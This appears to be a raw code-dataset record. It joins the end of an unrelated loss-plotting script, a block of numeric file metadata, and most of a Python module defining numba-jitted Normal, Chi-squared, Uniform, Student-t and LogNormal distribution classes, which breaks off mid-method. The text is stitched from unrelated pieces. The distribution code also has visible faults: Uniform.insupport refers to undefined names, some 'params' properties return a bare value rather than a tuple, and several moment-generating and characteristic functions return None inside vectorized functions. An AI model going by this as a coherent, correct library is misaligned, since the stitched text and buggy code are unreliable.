'/mnt/walkure_public/deanz/models/deepnet/us2multikey_all/deepnetunet_224res_1imgs_calib_all_multityping_05_st0.8_kf3'],
['/mnt/walkure_public/deanz/models/mfm/us2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_05_st0.8_sequence_kf4',
'/mnt/walkure_public/deanz/models/mfm/us2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_06_st0.8_sequence_kf1',
'/mnt/walkure_public/deanz/models/mfm/us2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_07_st0.8_sequence_kf0',
'/mnt/walkure_public/deanz/models/mfm/us2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_08_st0.8_sequence_kf2',
'/mnt/walkure_public/deanz/models/mfm/us2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_09_st0.8_sequence_kf3'],
['/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_23_st0.8_sequence_reslayer_retrained_mt_4qloss_kf4',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_24_st0.8_sequence_reslayer_retrained_mt_4qloss_kf0',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_25_st0.8_sequence_reslayer_retrained_mt_4qloss_kf1',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_26_st0.8_sequence_reslayer_retrained_mt_4qloss_kf2',
'/mnt/walkure_public/deanz/models/mfm/us2conf2multikey_all/mfmunet_224res_8imgs_calib_all_multityping_27_st0.8_sequence_reslayer_retrained_mt_4qloss_kf3']]
bce_losses = np.zeros((len(METHODS_NAMES),NUM_EXPS,NUM_EPOCHS))
for i, method_exps in enumerate(methods_folders):
for j, exp_dir in enumerate(method_exps):
bce_losses[i, j, :] = pd.read_csv(os.path.join(exp_dir, 'metric.csv'))['test_dev_loss'].iloc[:NUM_EPOCHS].values
# plot graph
bce_losses_features = np.zeros((len(METHODS_NAMES),3,NUM_EPOCHS))
for i in range(len(METHODS_NAMES)):
bce_losses_features[i, 0, :] = bce_losses[i,:,:].mean(axis=0)
bce_losses_features[i, 1, :] = bce_losses[i,:,:].min(axis=0)
bce_losses_features[i, 2, :] = bce_losses[i,:,:].max(axis=0)
plt.plot(range(1, NUM_EPOCHS+1), bce_losses_features[i, 0, :], label=METHODS_NAMES[i])
plt.fill_between(range(1, NUM_EPOCHS+1), bce_losses_features[i, 0, :] + bce_losses[i,:,:].std(axis=0), bce_losses_features[i, 0, :] - bce_losses[i,:,:].std(axis=0), alpha=0.5)
plt.legend(fontsize=12)
plt.xticks(range(1, NUM_EPOCHS+1, 2), fontsize=12)
plt.yticks(fontsize=12)
plt.xlim([1, NUM_EPOCHS])
plt.xlabel('Epoch')
plt.ylabel(r"$\mathcal{L}_{BCE}$")
plt.grid(True)
plt.tight_layout(pad=0.05)
plt.savefig(os.path.join("bce_graph_{}.{}".format(GRAPH_FILE, GRAPH_FORMAT)))
| 84.716216
| 180
| 0.757378
| 864
| 6,269
| 5.006944
| 0.166667
| 0.069348
| 0.110957
| 0.145631
| 0.812529
| 0.798659
| 0.786177
| 0.711743
| 0.681923
| 0.681923
| 0
| 0.066208
| 0.142287
| 6,269
| 74
| 181
| 84.716216
| 0.73833
| 0.011007
| 0
| 0
| 0
| 0
| 0.64386
| 0.623689
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.063492
| 0
| 0.063492
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1b1f6f4c00d5df492fd62834aa73c3f1cc9edd08
| 107,082
|
py
|
Python
|
rvlib/univariate.py
|
knaaptime/rvlib
|
6b393dc47c8669d502e208cde9e4100a223bc1ff
|
[
"BSD-3-Clause"
] | 42
|
2016-08-25T13:55:20.000Z
|
2022-02-04T23:53:45.000Z
|
rvlib/univariate.py
|
knaaptime/rvlib
|
6b393dc47c8669d502e208cde9e4100a223bc1ff
|
[
"BSD-3-Clause"
] | 17
|
2016-08-23T18:37:56.000Z
|
2022-02-22T04:46:07.000Z
|
rvlib/univariate.py
|
knaaptime/rvlib
|
6b393dc47c8669d502e208cde9e4100a223bc1ff
|
[
"BSD-3-Clause"
] | 11
|
2016-08-23T23:58:27.000Z
|
2021-07-25T19:48:51.000Z
|
"""
Univariate distributions.
@authors : Daniel Csaba <daniel.csaba@nyu.edu>
Spencer Lyon <spencer.lyon@stern.nyu.edu>
@date : 2016-07-26
"""
from os.path import join, dirname, abspath
from numba import vectorize, jit
from numba.experimental import jitclass
from numba import int32, float32
import numpy as np
from .specials import gamma, lgamma, digamma, beta, bessel_k, set_seed
from . import _rmath_ffi
from numba.core.typing import cffi_utils as cffi_support
cffi_support.register_module(_rmath_ffi)
# shut down divide by zero warnings for now
import warnings
warnings.filterwarnings("ignore")
import yaml
fn = join(dirname(abspath(__file__)), "metadata.yaml")
with open(fn, 'r') as ymlfile:
mtdt = yaml.safe_load(ymlfile)
# --------------------------------------------------
# docstring following Spencer Lyon's distcan package
# https://github.com/spencerlyon2/distcan.git
# --------------------------------------------------
univariate_class_docstr = r"""
Construct a distribution representing {name_doc} random variables. The
probability density function of the distribution is given by
.. math::
{pdf_tex}
Parameters
----------
{param_list}
Attributes
----------
{param_attributes}
location: scalar(float)
location of the distribution
scale: scalar(float)
scale of the distribution
shape: scalar(float)
shape of the distribution
mean : scalar(float)
mean of the distribution
median: scalar(float)
median of the distribution
mode : scalar(float)
mode of the distribution
var : scalar(float)
variance of the distribution
std : scalar(float)
standard deviation of the distribution
skewness : scalar(float)
skewness of the distribution
kurtosis : scalar(float)
kurtosis of the distribution
isplatykurtic : Boolean
boolean indicating if kurtosis > 0
isleptokurtic : bool
boolean indicating if kurtosis < 0
ismesokurtic : bool
boolean indicating if kurtosis == 0
entropy : scalar(float)
entropy value of the distribution
"""
param_str = "{name_doc} : {kind}\n {descr}"
def _create_param_list_str(names, descrs, kinds="scalar(float)"):
names = (names, ) if isinstance(names, str) else names
names = (names, ) if isinstance(names, str) else names
if isinstance(kinds, (list, tuple)):
if len(names) != len(kinds):
raise ValueError("Must have same number of names and kinds")
if isinstance(kinds, str):
kinds = [kinds for i in range(len(names))]
if len(descrs) != len(names):
raise ValueError("Must have same number of names and descrs")
params = []
for i in range(len(names)):
n, k, d = names[i], kinds[i], descrs[i]
params.append(param_str.format(name_doc=n, kind=k, descr=d))
return str.join("\n", params)
def _create_class_docstr(name_doc, param_names, param_descrs,
param_kinds="scalar(float)",
pdf_tex=r"\text{not given}", **kwargs):
param_list = _create_param_list_str(param_names, param_descrs,
param_kinds)
param_attributes = str.join(", ", param_names) + " : See Parameters"
return univariate_class_docstr.format(**locals())
# ============================= NEW DISTRIBUTION =================================
dnorm = _rmath_ffi.lib.dnorm
pnorm = _rmath_ffi.lib.pnorm
qnorm = _rmath_ffi.lib.qnorm
@vectorize(nopython=True)
def norm_pdf(mu, sigma, x):
return dnorm(x, mu, sigma, 0)
@vectorize(nopython=True)
def norm_logpdf(mu, sigma, x):
return dnorm(x, mu, sigma, 1)
@vectorize(nopython=True)
def norm_cdf(mu, sigma, x):
return pnorm(x, mu, sigma, 1, 0)
@vectorize(nopython=True)
def norm_ccdf(mu, sigma, x):
return pnorm(x, mu, sigma, 0, 0)
@vectorize(nopython=True)
def norm_logcdf(mu, sigma, x):
return pnorm(x, mu, sigma, 1, 1)
@vectorize(nopython=True)
def norm_logccdf(mu, sigma, x):
return pnorm(x, mu, sigma, 0, 1)
@vectorize(nopython=True)
def norm_invcdf(mu, sigma, q):
return qnorm(q, mu, sigma, 1, 0)
@vectorize(nopython=True)
def norm_invccdf(mu, sigma, q):
return qnorm(q, mu, sigma, 0, 0)
@vectorize(nopython=True)
def norm_invlogcdf(mu, sigma, lq):
return qnorm(lq, mu, sigma, 1, 1)
@vectorize(nopython=True)
def norm_invlogccdf(mu, sigma, lq):
return qnorm(lq, mu, sigma, 0, 1)
rnorm = _rmath_ffi.lib.rnorm
@jit(nopython=True)
def norm_rand(mu, sigma):
return rnorm(mu, sigma)
@vectorize(nopython=True)
def norm_mgf(mu, sigma, x):
return np.exp(x * mu + 0.5 * sigma**2 * x**2)
@vectorize(nopython=True)
def norm_cf(mu, sigma, x):
return np.exp(1j * x * mu - 0.5 * sigma**2 * x**2)
# -------------
# Normal
# -------------
spec = [
('mu', float32), ('sigma', float32)
]
@jitclass(spec)
class Normal():
# set docstring
__doc__ = _create_class_docstr(**mtdt['Normal'])
def __init__(self, mu, sigma):
self.mu, self.sigma = mu, sigma
def __str__(self):
return "Normal(mu=%.5f, sigma=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.mu, self.sigma)
@property
def location(self):
"""Return location parameter if exists."""
return self.mu
@property
def scale(self):
"""Return scale parameter if exists."""
return self.sigma
@property
def shape(self):
"""Return shape parameter if exists."""
return None
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return self.mu
@property
def median(self):
"""Return the median."""
return self.quantile(.5)
@property
def mode(self):
"""Return the mode."""
return self.mu
@property
def var(self):
"""Return the variance."""
return self.sigma ** 2
@property
def std(self):
"""Return the standard deviation."""
return self.sigma
@property
def skewness(self):
"""Return the skewness."""
return 0.0
@property
def kurtosis(self):
"""Return the kurtosis."""
return 0.0
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return 0.5 * (np.log(2*np.pi) + 1.0) + np.log(self.sigma)
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return norm_mgf(self.mu, self.sigma, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return norm_cf(self.mu, self.sigma, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return -np.inf < x < np.inf
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return norm_pdf(self.mu, self.sigma, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return norm_logpdf(self.mu, self.sigma, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
return sum(norm_logpdf(self.mu, self.sigma, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return norm_cdf(self.mu, self.sigma, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return norm_ccdf(self.mu, self.sigma, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return norm_logcdf(self.mu, self.sigma, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return norm_logccdf(self.mu, self.sigma, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return norm_invcdf(self.mu, self.sigma, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return norm_invccdf(self.mu, self.sigma, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return norm_invlogcdf(self.mu, self.sigma, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return norm_invlogccdf(self.mu, self.sigma, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = norm_rand(self.mu, self.sigma)
return out
# ============================= NEW DISTRIBUTION =================================
dchisq = _rmath_ffi.lib.dchisq
pchisq = _rmath_ffi.lib.pchisq
qchisq = _rmath_ffi.lib.qchisq
@vectorize(nopython=True)
def chisq_pdf(v, x):
return dchisq(x, v, 0)
@vectorize(nopython=True)
def chisq_logpdf(v, x):
return dchisq(x, v, 1)
@vectorize(nopython=True)
def chisq_cdf(v, x):
return pchisq(x, v, 1, 0)
@vectorize(nopython=True)
def chisq_ccdf(v, x):
return pchisq(x, v, 0, 0)
@vectorize(nopython=True)
def chisq_logcdf(v, x):
return pchisq(x, v, 1, 1)
@vectorize(nopython=True)
def chisq_logccdf(v, x):
return pchisq(x, v, 0, 1)
@vectorize(nopython=True)
def chisq_invcdf(v, q):
return qchisq(q, v, 1, 0)
@vectorize(nopython=True)
def chisq_invccdf(v, q):
return qchisq(q, v, 0, 0)
@vectorize(nopython=True)
def chisq_invlogcdf(v, lq):
return qchisq(lq, v, 1, 1)
@vectorize(nopython=True)
def chisq_invlogccdf(v, lq):
return qchisq(lq, v, 0, 1)
rchisq = _rmath_ffi.lib.rchisq
@jit(nopython=True)
def chisq_rand(v):
return rchisq(v)
@vectorize(nopython=True)
def chisq_mgf(v, x):
return (1.0 - 2.0 * x)**(-v * 0.5)
@vectorize(nopython=True)
def chisq_cf(v, x):
return (1.0 - 2.0 * 1j * x)**(-v * 0.5)
# -------------
# Chisq
# -------------
spec = [
('v', int32)
]
@jitclass(spec)
class Chisq():
# set docstring
__doc__ = _create_class_docstr(**mtdt['Chisq'])
def __init__(self, v):
self.v = v
def __str__(self):
return "ChiSquared(k=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.v)
@property
def location(self):
"""Return location parameter if exists."""
return None
@property
def scale(self):
"""Return scale parameter if exists."""
return None
@property
def shape(self):
"""Return shape parameter if exists."""
return self.v
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return self.v
@property
def median(self):
"""Return the median."""
return self.quantile(.5)
@property
def mode(self):
"""Return the mode."""
return max(self.v - 2, 0)
@property
def var(self):
"""Return the variance."""
return self.v * 2.0
@property
def std(self):
"""Return the standard deviation."""
return np.sqrt(self.v * 2.0)
@property
def skewness(self):
"""Return the skewness."""
return np.sqrt(8.0 / self.v)
@property
def kurtosis(self):
"""Return the kurtosis."""
return 12.0 / self.v
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return .5 * self.v + np.log(2.0) + lgamma(.5 * self.v) + (1.0 - .5 * self.v) * digamma(.5 * self.v)
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return chisq_mgf(self.v, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return chisq_cf(self.v, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return 0 <= x < np.inf
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return chisq_pdf(self.v, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return chisq_logpdf(self.v, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
return sum(chisq_logpdf(self.v, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return chisq_cdf(self.v, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return chisq_ccdf(self.v, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return chisq_logcdf(self.v, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return chisq_logccdf(self.v, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return chisq_invcdf(self.v, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return chisq_invccdf(self.v, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return chisq_invlogcdf(self.v, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return chisq_invlogccdf(self.v, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = chisq_rand(self.v)
return out
# ============================= NEW DISTRIBUTION =================================
dunif = _rmath_ffi.lib.dunif
punif = _rmath_ffi.lib.punif
qunif = _rmath_ffi.lib.qunif
@vectorize(nopython=True)
def unif_pdf(a, b, x):
return dunif(x, a, b, 0)
@vectorize(nopython=True)
def unif_logpdf(a, b, x):
return dunif(x, a, b, 1)
@vectorize(nopython=True)
def unif_cdf(a, b, x):
return punif(x, a, b, 1, 0)
@vectorize(nopython=True)
def unif_ccdf(a, b, x):
return punif(x, a, b, 0, 0)
@vectorize(nopython=True)
def unif_logcdf(a, b, x):
return punif(x, a, b, 1, 1)
@vectorize(nopython=True)
def unif_logccdf(a, b, x):
return punif(x, a, b, 0, 1)
@vectorize(nopython=True)
def unif_invcdf(a, b, q):
return qunif(q, a, b, 1, 0)
@vectorize(nopython=True)
def unif_invccdf(a, b, q):
return qunif(q, a, b, 0, 0)
@vectorize(nopython=True)
def unif_invlogcdf(a, b, lq):
return qunif(lq, a, b, 1, 1)
@vectorize(nopython=True)
def unif_invlogccdf(a, b, lq):
return qunif(lq, a, b, 0, 1)
runif = _rmath_ffi.lib.runif
@jit(nopython=True)
def unif_rand(a, b):
return runif(a, b)
@vectorize(nopython=True)
def unif_mgf(a, b, x):
return (np.exp(x * b) - np.exp(x * a))/(x * (b - a)) if x != 0 else 1
@vectorize(nopython=True)
def unif_cf(a, b, x):
return (np.exp(1j * x * b) - np.exp(1j * x * a))/(1j * x * (b - a))
# -------------
# Uniform
# -------------
spec = [
('a', float32), ('b', float32)
]
@jitclass(spec)
class Uniform():
# set docstring
__doc__ = _create_class_docstr(**mtdt['Uniform'])
def __init__(self, a, b):
self.a, self.b = a, b
def __str__(self):
return "Uniform(a=%.5f, b=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.a, self.b)
@property
def location(self):
"""Return location parameter if exists."""
return self.a
@property
def scale(self):
"""Return scale parameter if exists."""
return self.b - self.a
@property
def shape(self):
"""Return shape parameter if exists."""
return None
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return .5 * (self.a + self.b)
@property
def median(self):
"""Return the median."""
return .5 * (self.a + self.b)
@property
def mode(self):
"""Return the mode."""
return None
@property
def var(self):
"""Return the variance."""
return (self.b - self.a)**2/12
@property
def std(self):
"""Return the standard deviation."""
return (self.b - self.a)/np.sqrt(12)
@property
def skewness(self):
"""Return the skewness."""
return 0
@property
def kurtosis(self):
"""Return the kurtosis."""
return -1.2
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return np.log(self.b - self.a)
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return unif_mgf(self.a, self.b, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return unif_cf(self.a, self.b, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return a <= x < b
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return unif_pdf(self.a, self.b, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return unif_logpdf(self.a, self.b, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
return sum(unif_logpdf(self.a, self.b, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return unif_cdf(self.a, self.b, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return unif_ccdf(self.a, self.b, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return unif_logcdf(self.a, self.b, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return unif_logccdf(self.a, self.b, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return unif_invcdf(self.a, self.b, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return unif_invccdf(self.a, self.b, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return unif_invlogcdf(self.a, self.b, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return unif_invlogccdf(self.a, self.b, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = unif_rand(self.a, self.b)
return out
# ============================= NEW DISTRIBUTION =================================
dt = _rmath_ffi.lib.dt
pt = _rmath_ffi.lib.pt
qt = _rmath_ffi.lib.qt
@vectorize(nopython=True)
def tdist_pdf(v, x):
return dt(x, v, 0)
@vectorize(nopython=True)
def tdist_logpdf(v, x):
return dt(x, v, 1)
@vectorize(nopython=True)
def tdist_cdf(v, x):
return pt(x, v, 1, 0)
@vectorize(nopython=True)
def tdist_ccdf(v, x):
return pt(x, v, 0, 0)
@vectorize(nopython=True)
def tdist_logcdf(v, x):
return pt(x, v, 1, 1)
@vectorize(nopython=True)
def tdist_logccdf(v, x):
return pt(x, v, 0, 1)
@vectorize(nopython=True)
def tdist_invcdf(v, q):
return qt(q, v, 1, 0)
@vectorize(nopython=True)
def tdist_invccdf(v, q):
return qt(q, v, 0, 0)
@vectorize(nopython=True)
def tdist_invlogcdf(v, lq):
return qt(lq, v, 1, 1)
@vectorize(nopython=True)
def tdist_invlogccdf(v, lq):
return qt(lq, v, 0, 1)
rt = _rmath_ffi.lib.rt
@jit(nopython=True)
def tdist_rand(v):
return rt(v)
@vectorize(nopython=True)
def tdist_mgf(v, x):
return None
@vectorize(nopython=True)
def tdist_cf(v, x):
return bessel_k(v/2, np.sqrt(v)*abs(x))*(np.sqrt(v)*abs(x))**(v/2)/ (gamma(v/2)*2**(v/2 - 1))
# -------------
# T
# -------------
spec = [
('v', int32)
]
@jitclass(spec)
class T():
# set docstring
__doc__ = _create_class_docstr(**mtdt['T'])
def __init__(self, v):
self.v = v
def __str__(self):
return "T(df=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.v)
@property
def location(self):
"""Return location parameter if exists."""
return None
@property
def scale(self):
"""Return scale parameter if exists."""
return None
@property
def shape(self):
"""Return shape parameter if exists."""
return self.v
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return 0
@property
def median(self):
"""Return the median."""
return 0
@property
def mode(self):
"""Return the mode."""
return 0
@property
def var(self):
"""Return the variance."""
return self.v/(self.v - 2) if self.v > 2 else np.inf
@property
def std(self):
"""Return the standard deviation."""
return np.sqrt(self.v/(self.v - 2)) if self.v > 2 else np.inf
@property
def skewness(self):
"""Return the skewness."""
return 0 if self.v > 3 else None
@property
def kurtosis(self):
"""Return the kurtosis."""
return 6/(self.v - 4) if self.v > 4 else np.inf
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return .5*(self.v + 1)*(digamma(.5*(self.v + 1)) - digamma(.5*self.v)) + np.log(np.sqrt(self.v) * beta(.5*self.v, .5))
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return tdist_mgf(self.v, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return tdist_cf(self.v, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return -np.inf <= x < np.inf
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return tdist_pdf(self.v, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return tdist_logpdf(self.v, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
return sum(tdist_logpdf(self.v, x))
def cdf(self, x):
"""The cdf value(s) evaluated at x."""
return tdist_cdf(self.v, x)
def ccdf(self, x):
"""The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
return tdist_ccdf(self.v, x)
def logcdf(self, x):
"""The logarithm of the cdf value(s) evaluated at x."""
return tdist_logcdf(self.v, x)
def logccdf(self, x):
"""The logarithm of the complementary cdf evaluated at x."""
return tdist_logccdf(self.v, x)
def quantile(self, q):
"""The quantile value evaluated at q."""
return tdist_invcdf(self.v, q)
def cquantile(self, q):
"""The complementary quantile value evaluated at q."""
return tdist_invccdf(self.v, q)
def invlogcdf(self, lq):
"""The inverse function of the logcdf."""
return tdist_invlogcdf(self.v, lq)
def invlogccdf(self, lq):
"""The inverse function of the logccdf."""
return tdist_invlogccdf(self.v, lq)
# ========
# Sampling
# ========
def rand(self, n):
"""Generates a vector of n independent samples from the distribution."""
out = np.empty(n)
for i, _ in np.ndenumerate(out):
out[i] = tdist_rand(self.v)
return out
# ============================= NEW DISTRIBUTION =================================
dlnorm = _rmath_ffi.lib.dlnorm
plnorm = _rmath_ffi.lib.plnorm
qlnorm = _rmath_ffi.lib.qlnorm
@vectorize(nopython=True)
def lognormal_pdf(mu, sigma, x):
return dlnorm(x, mu, sigma, 0)
@vectorize(nopython=True)
def lognormal_logpdf(mu, sigma, x):
return dlnorm(x, mu, sigma, 1)
@vectorize(nopython=True)
def lognormal_cdf(mu, sigma, x):
return plnorm(x, mu, sigma, 1, 0)
@vectorize(nopython=True)
def lognormal_ccdf(mu, sigma, x):
return plnorm(x, mu, sigma, 0, 0)
@vectorize(nopython=True)
def lognormal_logcdf(mu, sigma, x):
return plnorm(x, mu, sigma, 1, 1)
@vectorize(nopython=True)
def lognormal_logccdf(mu, sigma, x):
return plnorm(x, mu, sigma, 0, 1)
@vectorize(nopython=True)
def lognormal_invcdf(mu, sigma, q):
return qlnorm(q, mu, sigma, 1, 0)
@vectorize(nopython=True)
def lognormal_invccdf(mu, sigma, q):
return qlnorm(q, mu, sigma, 0, 0)
@vectorize(nopython=True)
def lognormal_invlogcdf(mu, sigma, lq):
return qlnorm(lq, mu, sigma, 1, 1)
@vectorize(nopython=True)
def lognormal_invlogccdf(mu, sigma, lq):
return qlnorm(lq, mu, sigma, 0, 1)
rlnorm = _rmath_ffi.lib.rlnorm
@jit(nopython=True)
def lognormal_rand(mu, sigma):
return rlnorm(mu, sigma)
@vectorize(nopython=True)
def lnorm_mgf(mu, sigma, x):
return None
@vectorize(nopython=True)
def lnorm_cf(mu, sigma, x):
return None
# -------------
# LogNormal
# -------------
spec = [
('mu', float32), ('sigma', float32)
]
@jitclass(spec)
class LogNormal():
# set docstring
__doc__ = _create_class_docstr(**mtdt['LogNormal'])
def __init__(self, mu, sigma):
self.mu, self.sigma = mu, sigma
def __str__(self):
return "LogNormal(mu=%.5f, sigma=%.5f)" %(self.params)
def __repr__(self):
return self.__str__()
# ===================
# Parameter retrieval
# ===================
@property
def params(self):
"""Return a tuple of parameters."""
return (self.mu, self.sigma)
@property
def location(self):
"""Return location parameter if exists."""
return self.mu
@property
def scale(self):
"""Return scale parameter if exists."""
return self.sigma
@property
def shape(self):
"""Return shape parameter if exists."""
return None
# ==========
# Statistics
# ==========
@property
def mean(self):
"""Return the mean."""
return np.exp(self.mu + .5* self.sigma**2)
@property
def median(self):
"""Return the median."""
return np.exp(self.mu)
@property
def mode(self):
"""Return the mode."""
return np.exp(self.mu - self.sigma**2)
@property
def var(self):
"""Return the variance."""
return (np.exp(self.sigma**2) - 1) * np.exp(2*self.mu + self.sigma**2)
@property
def std(self):
"""Return the standard deviation."""
return np.sqrt(self.var)
@property
def skewness(self):
"""Return the skewness."""
return (np.exp(self.sigma**2) + 2) * np.sqrt(np.exp(self.sigma**2) - 1)
@property
def kurtosis(self):
"""Return the kurtosis."""
return np.exp(4*self.sigma**2) + 2*np.exp(3*self.sigma**2) + 3*np.exp(2*self.sigma**2) - 6
@property
def isplatykurtic(self):
"""Kurtosis being greater than zero."""
return self.kurtosis > 0
@property
def isleptokurtic(self):
"""Kurtosis being smaller than zero."""
return self.kurtosis < 0
@property
def ismesokurtic(self):
"""Kurtosis being equal to zero."""
return self.kurtosis == 0.0
@property
def entropy(self):
"""Return the entropy."""
return np.log(self.sigma*np.exp(self.mu + .5)*np.sqrt(2*np.pi))
def mgf(self, x):
"""Evaluate the moment generating function at x."""
return lnorm_mgf(self.mu, self.sigma, x)
def cf(self, x):
"""Evaluate the characteristic function at x."""
return lnorm_cf(self.mu, self.sigma, x)
# ==========
# Evaluation
# ==========
def insupport(self, x):
"""When x is a scalar, return whether x is within
the support of the distribution. When x is an array,
return whether every element of x is within
the support of the distribution."""
return 0 < x < np.inf
def pdf(self, x):
"""The pdf value(s) evaluated at x."""
return lognormal_pdf(self.mu, self.sigma, x)
def logpdf(self, x):
"""The logarithm of the pdf value(s) evaluated at x."""
return lognormal_logpdf(self.mu, self.sigma, x)
def loglikelihood(self, x):
"""The log-likelihood of the distribution w.r.t. all
samples contained in array x."""
